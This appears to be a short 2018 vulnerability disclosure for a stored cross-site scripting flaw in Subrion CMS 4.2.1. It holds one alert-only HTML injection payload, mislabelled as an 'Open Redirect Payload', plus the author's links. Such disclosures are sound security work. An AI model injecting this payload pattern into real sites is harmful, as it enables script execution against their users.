Subrion CMS version 4.2.1 suffers from a persistent cross site scripting vulnerability.
e835172a60b9d7eca6efb643b1c52aa3c532db9cbb5f6869afb2f1777c685048
# Exploit Title: [ Stored XSS at Subrion CMS 4.2.1 ]
# Date: [ 06.06.2018 ]
# Exploit Author: [ Ismail Tasdelen ]
# Vendor Homepage: [ https://intelliants.com/ ]
# Software : [ Subrion CMS ]
# Software Version : [ 4.2.1 ]
# Vulnerability : Stored XSS
# Open Redirect Payload : "><img src=x onerror=alert('ismailtasdelen')>
# Type: Webapps
# PoC Video : https://www.youtube.com/watch?v=MQaEnbGwADc
# Test on : Kali Linux - Google Chrome / Mozilla FireFox -- Last Version
https://localhost/?demo-core&admin=1
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln